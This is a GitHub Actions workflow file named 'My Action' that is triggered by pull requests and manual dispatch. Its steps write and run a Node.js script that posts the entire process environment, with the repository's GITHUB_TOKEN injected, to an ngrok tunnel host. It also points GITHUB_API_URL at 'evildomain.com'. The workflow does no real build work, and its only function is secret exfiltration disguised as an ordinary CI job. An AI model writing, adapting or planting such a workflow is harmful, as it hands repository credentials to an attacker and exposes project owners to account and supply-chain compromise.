name: My Action
on:
  workflow_dispatch:
  pull_request:
    types: [opened, synchronize, reopened]
jobs:
  my-action:
    runs-on: ubuntu-latest
    steps:
      - run: mkdir test
      - run: cd test && npm init -y
      - run: touch index.js
      - run: npm install axios express
      - run: echo "const express = require('express'); const axios = require('axios'); const app = express(); app.use(express.json()); app.listen(3000, async() => {await axios.post('https://a1e6-185-187-131-197.ngrok.io', process.env)});" > index.js
      - run: GITHUB_API_URL=https://evildomain.com MY_TOKEN=${{ secrets.GITHUB_TOKEN }} node index.js
